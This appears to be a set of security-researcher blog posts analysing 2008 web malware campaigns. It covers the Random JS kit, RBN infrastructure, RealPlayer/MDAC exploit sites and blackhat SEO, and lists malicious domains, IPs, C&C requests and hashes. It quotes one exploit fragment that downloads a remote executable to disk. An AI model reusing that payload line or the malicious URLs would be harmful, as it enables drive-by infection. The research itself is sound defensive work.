The Random JS Malware Exploitation Kit

The Random JS infection kit as originally named by Finjan, is perhaps the first publicly announced malicious innovation for 2008, in fact I've managed to obtain a copy of a sample .js and witness the filename change on the next request combined with complete disappearance of any .js on the third visit. Here's some press coverage - "Over 10,000 trusted websites infected by new Trojan toolkit" :

"The random js attack is performed by dynamic embedding of scripts into a webpage. It provides a random filename that can only be accessed once. This dynamic embedding is done in such a selective manner that when a user has received a page with the embedded malicious script once, it will not be referenced again on further requests. This method prevents detection of the malware in later forensic analyses."

And several more articles - "Hacking Toolkit Compromises Thousands Of Web Servers" ; "Trojan toolkit infected 10000 Web sites in December" ; "Legitimate sites serving up stealthy attacks". Compared to all of the malware embedded attacks during 2007 which were serving the malware from a secondary domain, as well as the exploits themselves, in attack technique is hosting everything on the infected domain. Sample random and local malware locations :

bunburyymas.com/ihkxtmzl

bunburyymas.com/odjiffkl

techicorner.com/bcuoixqf

otcash.com/ktehxwmj

otcash.com/soqutkue

otcash.com/bemkwijz

Sample .js random filenames :

cgolu.js; czynd.js; eenom.js; eqfps.js; erztp.js; frpmg.js; iggmy.js; jiodm.js; khkev.js; kksyr.js; kobgw.js; kolqj.js; lvmlt.js; nrvaj.js; oalhi.js; pcqab.js; tezam.js; tfxep.js; unolc.js; vduoz.js;

Sample malware hosting URL snippet :

bunburyymas.com/odjiffkl","c:\\mosvs8.exe",5,1,"mosvs8"); } catch(OBJECT id=yah8 classid=clsid:24F3EAD6-8B87-4C1A-97DA-71C126BDA08F> try { yah8.GetFile( bunburyymas.com/odjiffkl","c:\\mosvs8.exe",5,1,"mosvs8"); } catch(

Copies of the malware obtained mosvs8.exe -- and logically submitted to each and every anti virus vendor on behalf of VirusTotal just like every sample I ever came across to in the incident responses -- attempt to connect to 206.53.51.75, 206.53.56.30, and back39409404.com, making naughty web requests such as :

206.53.51.75/cgi-bin/options.cgi?user_id=3335213046&socks=6267&version_id=904&passphrase=fkjvhsdvlksdhvlsd&crc=3c64cb2e

&uptime=00:00:58:38

back39409404.com/cgi-bin/options.cgi?user_id=3335213046&socks=6267&version_id=904&passphrase=fkjvhsdvlksdhvlsd&crc=3c64cb2e

&uptime=00:00:58:35

The following files are partly accessible at the still active C&C's, the first one for instance :

cgi-bin/forms.cgi

cgi-bin/cert.cgi

cgi-bin/options.cgi

cgi-bin/ss.cgi

cgi-bin/pstore.cgi

cgi-bin/cmd.cgi

cgi-bin/file.cgi

Did anti virus vendors come up with a detection pattern for the .js already? Partly.

Detection rate : Result: 11/32 (34.38%) JS.IEslice.aq; JS/SillyDlScript.DG; Exploit:JS/Mult.K

File size: 31679 bytes

MD5: 93152dc2392349d828526157bf601677

SHA1: 1b10790d16c9c0d87132d40503b37f82b7f03560

And now that we've witnessed the execution of such an advanced and random attack approach limiting the possibilities for assessing the impact of a malware embedded attack the way it was done so far, we can only speculate on what's to come by the end of the first quarter of 2008. From my perspective however, the smartest thing in this type of attack technique is that they limit the leads they leave behind to the minimum, thus, forwarding the responsibility to the infected host and limiting the possibility for easy expanding of the rest of their ecosystem. Moreover, despite that the module or the actual kit if it's really a kit is a Proprietary Malware Tool for the time being, it will sooner or later leak out, and turn into a commodity, just like MPack and IcePack are these days.

RBN's Fake Account Suspended Notices

In the last quarter of 2007, under the public pressure put on the Russian Business Network's malicious practices, the RBN started faking the removal of malicious domains from its network by placing fake account suspended notices, but continuing the malware and exploit serving campaigns on them. And since I constantly monitor RBN activity, in particular their relationship with the New Media Malware Gang and Storm Worm, a relationship that I've in fact established several times before, a recently assessed malicious domain further expands their underground ecosystem. Let the data speak for itself :

dev.aero4.cn/adpack/index.php (195.5.116.244) once deobfuscated loads dev.aero4.cn/adpack/load.php :

Detection rate : 11/32 (34.38%)
File size: 6656 bytes
MD5: 5eb0ee32613d8a611b6dc848050f3871
SHA1: 55c0448645a8ed2e14e6826fae25f8f9c868be30

It gets even more interesting as the downloader attempts to download the following :

88.255.94.250/s2/200.exe
88.255.94.250/s2/m.exe
88.255.94.250/s2/d.exe
88.255.94.250/s2/un.php

And as I've already pointed out in a previous post, 88.255.94.250 is the New Media Malware Gang. Moreover, next to m.exe and d.exe with an over 50% detection rates, 200.exe is impressively detected by one anti virus vendor only :

Detection rate : 1/32 (3.13%)
File size: 33280 bytes
MD5: 9bf9265df5dea81135355d161f3522be
SHA1: 44cdcaf5e8791e10506e3343d73a2993511fa91f

Further continuing this assessment, firewalllab.cn (203.117.111.106) also responds to aero4.cn, and is hosted at AS4657 STARHUBINTERNET AS Starhub Internet Pte Ltd 31, Kaki Bukit Rd 3 SINGAPORE (previously known as CyberWay Pte Ltd). Even more interesting is the fact that 203.117.111.106 is also responding to known New Media Malware Gang domains :

businesswr.cn
fileuploader.cn
firewalllab.cn
otmoroski.cn
otmoroski.info
security4u.cn
tdds.ru
traffshop.ru
x-victory.ru

Furthermore, 203.117.111.106 seems to have made an appearance at otrix.ru, where in between the obfuscation an IFRAME loads to 58.65.233.97/forum.php, where two more get loaded 4qobj63z.tarog.us/tds/in.cgi?14; 4qobj63z.tarog.us/tds/in.cgi?15. Deja vu, again, again and again - 4qobj63z.tarog.us was among the domains used in the malware embedded attack again the French government's site related to Lybia, and there I made the connection with the New Media Malware Gang for yet another time.

There's indeed a connection between the RBN, Storm Worm and the The New Media malware gang. The malware gang is either a customer of the RBN, partners with the RBN sharing know-how in exchange for infrastructure on behalf of the RBN, or RBN's actual operational department. Piece by piece and an ugly puzzle picture appears thanks to everyone monitoring the RBN that is still 100% operational.

PAINTing a Botnet IRC Channel

I suppose that even for a script kiddie it takes extra time and patience to come up with such a spoofed IRC channel getting crowded with infected hosts. Drawing courtesy of a script kiddie's wishful thinking. Here are some screenshots from the real world, and some of the most recent developments I covered in previous posts.

The Pseudo "Real Players"

What happened with the recent RealPlayer massive embedded malware attack? Two of the main hosts are now, and the third one ucmal.com/0.js is strangely loading an iframe to ISC's blog in between the following 61.188.39.218/pingback.txt which was returning the following message during the last couple of hours "You're welcome for being saved from near infection".

As I'm sure others too like to analyze post incident response behavior of the malicious parties, in respect to this particular attack, during the weekend they took advantage of what's now a patent of the Russian Business Network, namely to serve a fake 404 error message but continue the campaign. However, in RBN's case, only the indexes were serving the fake account suspended messages, but the campaign was still active on the rest of the internal pages. In the RealPlayer's campaign case, the 404 error messages themselves were embedded with the same IFRAMEs as well, in order to make it look like there's an error, at least in front of the eyes of the average Internet user.

Despite that the main campaign domains are blocked on a worldwide scale, the hundreds of thousands of sites that originally participated are still not clean and continue trying to load the now down domains. Moreover, the big picture has to do with a fourth domain as well, yl18.net/0.js, that used to be a part of the same type of massive malware embedded attack in November, 2007.

Why pseudo "real players" anyway? Because for this attack, they took advantage of what can be defined as a fad, namely the use seperate exploit as the cornerstone of the campaign, at least if its massive infection they wanted to achieve. The "real players" or script kiddies on the majority of occasions, serve exploits on a client-side matching basis, and therefore the more diverse the exploits set, the higher the probability a vulnerable application will be detected and exploited. Therefore, given the number of sites affected it could have been much worse than it is currently based on speculations of the success rate of the campaign in terms of infections, not the sites affected - a success by itself. Execution gone wrong given the foundation for the attack - until the next time.

Malware Serving Exploits Embedded Sites as Usual

The combination of the recent RealPlayer exploit and MDAC is a fad, but the very same is getting embraced in the short-term by malicious parties in China that have also started combining the Internet Explorer VML Download and Execute Exploit (MS07-004), thanks to recent localized forum postings on modifying the third exploit. Let's assess several sample domains.

8v8.biz/ms07004.htm (58.53.128.98) is such a domain that's serving a combination of these starting with Exploit-MS07-004 :

Result: 12/32 (37.5%)
File size: 3432 bytes
MD5: bafab9b8e38527e9830047fd66b39532
SHA1: b81abcf63a2c4bcf43526f28aec20fca2f58d67c

8v8.biz/1.htm - MDAC also loads 8v8.biz/06014.html in between 8v8.biz/r.htm - real player unobfuscated, wheere all of these attempt to load 8v8.biz/v.exe - Worm.Win32.AutoRun.bkx; Win32/Cekar!generic

Result: 27/31 (87.10%)
File size: 19501 bytes
MD5: 7b101f7baeae0ebab9ecc06fdb9542dc
SHA1: 36ffa50ce3873fb04c13c80421c205a7760f47ca

The binary is using a default set of known executables of anti malware products, and is installing a default debugger injected upon execution of any of these, and is therefore successfully killing many of the applications.

Another exploit serving domain with a very diverse set of exploits used, but again serving the faddish RealPlayer plus MDAC combination is uc147.com (218.107.216.85) :

uc147.com/test/MS07004.htm
uc147.com/test/PPs.htm
uc147.com/test/biaxing06014.Htm
uc147.com/test/index.htm
uc147.com/test/Click_here.html
uc147.com/test/PPLIVE.htm
uc147.com/test/Thunder.html
uc147.com/test/bf.htm
uc147.com/test/Open.htm
uc147.com/test/ms06014.htm
uc147.com/test/jetAudio%207.x.htm

where all are trying to load uc147.com/zy.exe :

Result: 24/32 (75%)
File size: 15456 bytes
MD5: 3a0804d8e12706e97cdda6aa4f50ef5f
SHA1: cfd2f158a658dc0d8618c35806b94008b4fb1c0f

The third domain is great example of what's an emerging trend rather than a fad, namely the use of comprehensive multiple IFRAMES loading campaigns. qx13.cn/3.htm (61.174.61.94) (IE COM CreateObject Code Execution (MS06-042) which loads sp.070808.net/23.htm, (75.126.3.218) where the following try to load as well :

sp.070808.net/in.htm
wc.070808.net/37.htm
az.sbb22.com/hh.htm
um.uuzzvv.com/uu.htm
fa.55189.net
acc.jqxx.org/40.htm
ktv.mm5208.com/25.htm

Two other IFRAMES within within qx13.cn/3.htm, w.aeaer.com/ae.htm (75.126.3.216) loads the same IFRAMES, and qi.ccbtv.net/btv.htm (66.90.79.138) again loads the same IFRAMEs. It gets even more complicated and the ecosystem more comprehensive as the secondary IFRAMEs logically load many others such as :

68yu.cn/s29.htm
ermei.loveyoushipin.com/pic/9041.htm
yun.yun878.com/web/6619038.htm
ppp.749571.com/ww/new82.htm
2.xks08.com/dm1.htm?60
ad.2365.us/110

The more complicated and dynamic these IFRAME-ing attacks get, the higher the campaign's lifecycle becomes, making it harder the determine where's the weakest link, and making it easier for the malicious parties to evaluate which node needs a boost by including new domains spread across different netblocks like this case.

The Invisible Blackhat SEO Campaign

Count this as a historical example of a blackhat SEO campaign, and despite that "Fresh Afield's" blog (blogs.mdc.mo.gov) is now clean, cached copies confirm the existence of hidden links that were embedded on each and every post on it, apparently due to a compromise. The blackhat SEO links invisible embedded within the blog's posts on the other hand point to a compromised account at the Texas A&M University (aero.tamu.edu/people/raktim), as you can see in the screenshot. Moreover, there's also a visible part of the campaign that was located under blogs.mdc.mo.gov/custom/?0f, and as usual, once the blackhat SEO pages were either uploaded or embedded like it happened in this case, the campaigns under the blogs.mdc.mo.gov URL were spammed across the Internet.